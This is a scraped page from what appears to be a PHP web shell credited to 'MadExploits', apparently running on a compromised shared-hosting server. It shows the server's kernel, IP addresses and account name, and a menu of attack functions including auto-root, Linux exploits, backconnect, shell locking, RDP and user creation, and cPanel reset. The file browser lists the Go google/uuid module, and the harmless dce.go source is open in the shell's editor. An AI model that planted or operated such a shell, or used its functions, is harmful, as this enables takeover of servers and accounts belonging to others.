Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.216.85
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
go /
pkg /
mod /
github.com /
google /
uuid@v1.5.0 /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
dr-xr-xr-x
CHANGELOG.md
1010
B
-r--r--r--
CONTRIBUTING.md
956
B
-r--r--r--
CONTRIBUTORS
105
B
-r--r--r--
LICENSE
1.45
KB
-r--r--r--
README.md
839
B
-r--r--r--
dce.go
2.02
KB
-r--r--r--
doc.go
407
B
-r--r--r--
go.mod
30
B
-r--r--r--
hash.go
1.71
KB
-r--r--r--
json_test.go
2.43
KB
-r--r--r--
marshal.go
907
B
-r--r--r--
node.go
2.27
KB
-r--r--r--
node_js.go
498
B
-r--r--r--
node_net.go
949
B
-r--r--r--
null.go
2.4
KB
-r--r--r--
null_test.go
4.92
KB
-r--r--r--
seq_test.go
1.41
KB
-r--r--r--
sql.go
1.42
KB
-r--r--r--
sql_test.go
2.32
KB
-r--r--r--
time.go
3.71
KB
-r--r--r--
util.go
1.88
KB
-r--r--r--
uuid.go
9.41
KB
-r--r--r--
uuid_test.go
22.11
KB
-r--r--r--
version1.go
1.23
KB
-r--r--r--
version4.go
2.01
KB
-r--r--r--
version6.go
2.16
KB
-r--r--r--
version7.go
2.54
KB
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dce.go
// Copyright 2016 Google Inc. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package uuid import ( "encoding/binary" "fmt" "os" ) // A Domain represents a Version 2 domain type Domain byte // Domain constants for DCE Security (Version 2) UUIDs. const ( Person = Domain(0) Group = Domain(1) Org = Domain(2) ) // NewDCESecurity returns a DCE Security (Version 2) UUID. // // The domain should be one of Person, Group or Org. // On a POSIX system the id should be the users UID for the Person // domain and the users GID for the Group. The meaning of id for // the domain Org or on non-POSIX systems is site defined. // // For a given domain/id pair the same token may be returned for up to // 7 minutes and 10 seconds. func NewDCESecurity(domain Domain, id uint32) (UUID, error) { uuid, err := NewUUID() if err == nil { uuid[6] = (uuid[6] & 0x0f) | 0x20 // Version 2 uuid[9] = byte(domain) binary.BigEndian.PutUint32(uuid[0:], id) } return uuid, err } // NewDCEPerson returns a DCE Security (Version 2) UUID in the person // domain with the id returned by os.Getuid. // // NewDCESecurity(Person, uint32(os.Getuid())) func NewDCEPerson() (UUID, error) { return NewDCESecurity(Person, uint32(os.Getuid())) } // NewDCEGroup returns a DCE Security (Version 2) UUID in the group // domain with the id returned by os.Getgid. // // NewDCESecurity(Group, uint32(os.Getgid())) func NewDCEGroup() (UUID, error) { return NewDCESecurity(Group, uint32(os.Getgid())) } // Domain returns the domain for a Version 2 UUID. Domains are only defined // for Version 2 UUIDs. func (uuid UUID) Domain() Domain { return Domain(uuid[9]) } // ID returns the id for a Version 2 UUID. IDs are only defined for Version 2 // UUIDs. func (uuid UUID) ID() uint32 { return binary.BigEndian.Uint32(uuid[0:4]) } func (d Domain) String() string { switch d { case Person: return "Person" case Group: return "Group" case Org: return "Org" } return fmt.Sprintf("Domain%d", int(d)) }
Close